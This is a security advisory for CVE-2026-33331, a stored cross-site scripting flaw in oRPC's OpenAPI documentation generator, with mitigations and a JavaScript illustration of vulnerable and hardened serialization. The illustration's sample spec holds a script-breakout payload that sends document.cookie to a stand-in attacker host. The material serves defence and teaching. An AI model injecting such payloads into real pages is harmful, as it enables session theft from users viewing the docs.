CVE-2026-33331
Published: 24 March 2026
Summary
CVE-2026-33331 is a high-severity stored cross-site scripting (CWE-79) vulnerability in oRPC prior to version 1.13.9. Its CVSS v3.1 base score is 8.2 (High).
Operationally, exploitation maps to the MITRE ATT&CK technique Command and Scripting Interpreter: JavaScript (T1059.007). The CVE is ranked at the 5.7th percentile by exploit likelihood (well below the median), is not currently listed in the CISA KEV catalog, and a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
- SI-15 (Information Output Filtering): encode or filter the serialized specification when it is written into the generated OpenAPI documentation, so that a string field cannot break out of the JSON context and run arbitrary JavaScript in the viewer's browser. This is the control that closes the bug itself.
- SI-10 (Information Input Validation): validate or reject untrusted content in OpenAPI specification fields such as info.description before documentation is generated. Treat this as defence in depth rather than the primary fix: description fields legitimately carry Markdown, so a blocklist of tags is easy to bypass and will also reject benign content.
- Flaw remediation: patch oRPC to version 1.13.9 or later, which directly addresses the vulnerability in documentation generation.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Stored XSS enables arbitrary JavaScript execution (T1059.007) in victim browsers when viewing poisoned OpenAPI docs; this directly supports drive-by compromise (T1189) of users and exploitation of the public-facing API documentation generator (T1190).
NVD Description
oRPC is a tool that helps build APIs that are end-to-end type-safe and adhere to OpenAPI standards. Prior to version 1.13.9, a stored cross-site scripting (XSS) vulnerability exists in the OpenAPI documentation generation of orpc. If an attacker can control any field within the OpenAPI specification (such as info.description), they can break out of the JSON context and execute arbitrary JavaScript when a user views the generated API documentation. This issue has been patched in version 1.13.9.
Deeper analysis
CVE-2026-33331 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting oRPC, a tool for building end-to-end type-safe APIs that adhere to OpenAPI standards. In versions prior to 1.13.9, the vulnerability resides in the OpenAPI documentation generation process, where an attacker can inject malicious payloads into controllable fields of the OpenAPI specification, such as info.description. This allows breakout from the JSON context, enabling arbitrary JavaScript execution when users view the generated API documentation. The issue carries a CVSS v3.1 base score of 8.2 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N), indicating high severity due to network accessibility, low attack complexity, and significant confidentiality impact with changed scope.
The attack requires an attacker to control any field in the OpenAPI specification, which could occur if the specification is user-supplied, dynamically generated from untrusted inputs (for example, route descriptions derived from tenant or user data), or modified in a shared environment. Note that PR:N describes the position of the victim who views the documentation, not the planting step: an attacker still needs some write path into a spec field, so the practical exposure of a deployment depends on whether any such path exists. Once a payload is in place, a remote, unauthenticated attacker can trigger JavaScript execution in the browser of anyone who views the generated documentation (UI:R). Successful exploitation leads to high confidentiality impact (C:H), such as theft of session cookies, tokens, or sensitive data from the authenticated user viewing the docs, with low integrity impact (I:L) and no availability disruption (A:N).
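The following is an added illustration of the bug class described in this analysis and in the Mitigating Controls list above; it is not oRPC's code, nor the proof-of-concept the advisory references. It assumes the documentation page embeds the serialized spec inside an inline script element (the advisory only says the payload "breaks out of the JSON context"), and all function names, the sample spec and the attacker URL are constructed for the example. It shows the vulnerable serialization next to a hardened one (the SI-15 output-filtering control) and an audit walk over the spec that flags fields worth reviewing (the SI-10 side).

```javascript
// Added illustration for CVE-2026-33331 (not oRPC's own code). It models the
// bug class the advisory describes: an OpenAPI spec serialized into the
// documentation page, where an attacker-controlled string such as
// info.description ends the surrounding context and injects markup.
// ASSUMPTION: the page embeds the spec inside an inline <script> element;
// the advisory itself only says the payload "breaks out of the JSON context".

// Vulnerable rendering. JSON.stringify produces valid JSON, but the HTML
// parser tokenizes the document before any JavaScript runs: the first
// "</script>" it sees inside the string literal terminates the element,
// and whatever follows is parsed as fresh HTML.
function renderDocsUnsafe(spec) {
  return [
    '<!doctype html><html><body><div id="app"></div>',
    `<script>window.__spec = ${JSON.stringify(spec)};</script>`,
    '</body></html>',
  ].join('\n');
}

// Hardened serialization (output filtering). Every character that can alter
// meaning inside a script element or JS source text is rewritten as a JSON
// \uXXXX escape. The result is still valid JSON, so the browser (or
// JSON.parse) recovers the identical value, but the text can no longer
// contain "</script", "<!--" or the JS line terminators U+2028/U+2029.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderDocsSafe(spec) {
  return [
    '<!doctype html><html><body><div id="app"></div>',
    `<script>window.__spec = ${jsonForScript(spec)};</script>`,
    '</body></html>',
  ].join('\n');
}

// Audit helper (input-validation side). Walks a spec and returns the JSON
// paths of string values containing tag delimiters, so a reviewer can find
// untrusted content that reached fields such as info.description before the
// docs are generated. A hit is a signal to investigate, not proof of attack:
// Markdown descriptions may legitimately contain inline HTML.
function findSuspiciousFields(node, path = '$') {
  const hits = [];
  if (typeof node === 'string') {
    if (/<\/?[a-z!]/i.test(node)) hits.push(path);
  } else if (Array.isArray(node)) {
    node.forEach((v, i) => hits.push(...findSuspiciousFields(v, `${path}[${i}]`)));
  } else if (node && typeof node === 'object') {
    for (const [k, v] of Object.entries(node)) {
      hits.push(...findSuspiciousFields(v, `${path}.${k}`));
    }
  }
  return hits;
}

// Counts "</script>" occurrences; the rendered page should contain exactly
// one (its own closing tag). More than one means a string broke out.
function countScriptCloses(html) {
  return (html.match(/<\/script>/gi) || []).length;
}

// Constructed sample spec (not a payload from the advisory): a hostile
// info.description of the kind the NVD text describes.
const maliciousSpec = {
  openapi: '3.1.0',
  info: {
    title: 'Demo API',
    version: '1.0.0',
    description: 'Public docs</script><script>fetch("https://attacker.invalid/?c="+document.cookie)</script>',
  },
  paths: {},
};

const unsafeHtml = renderDocsUnsafe(maliciousSpec);
const safeHtml = renderDocsSafe(maliciousSpec);
console.log('unsafe page </script> count:', countScriptCloses(unsafeHtml)); // 3
console.log('safe page   </script> count:', countScriptCloses(safeHtml));   // 1
console.log('suspicious fields:', findSuspiciousFields(maliciousSpec));      // [ '$.info.description' ]
```

The escaping in jsonForScript is the general fix for embedding JSON in a script element, not something specific to oRPC: because the escapes are JSON escapes rather than HTML entities, the embedded value is unchanged when parsed, which is what makes output encoding preferable to stripping characters from the spec itself.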
Mitigation is available via upgrade to oRPC version 1.13.9, where the vulnerability has been patched. Official advisories and resources, including the GitHub security advisory (GHSA-7f6v-3gx7-27q8), release notes for v1.13.9, and the fixing commit (4f0efa8a1d3fa8e8317a4b03cc3945a5dfd68add), detail the resolution and recommend immediate updates for affected deployments.
Details
- CWE(s)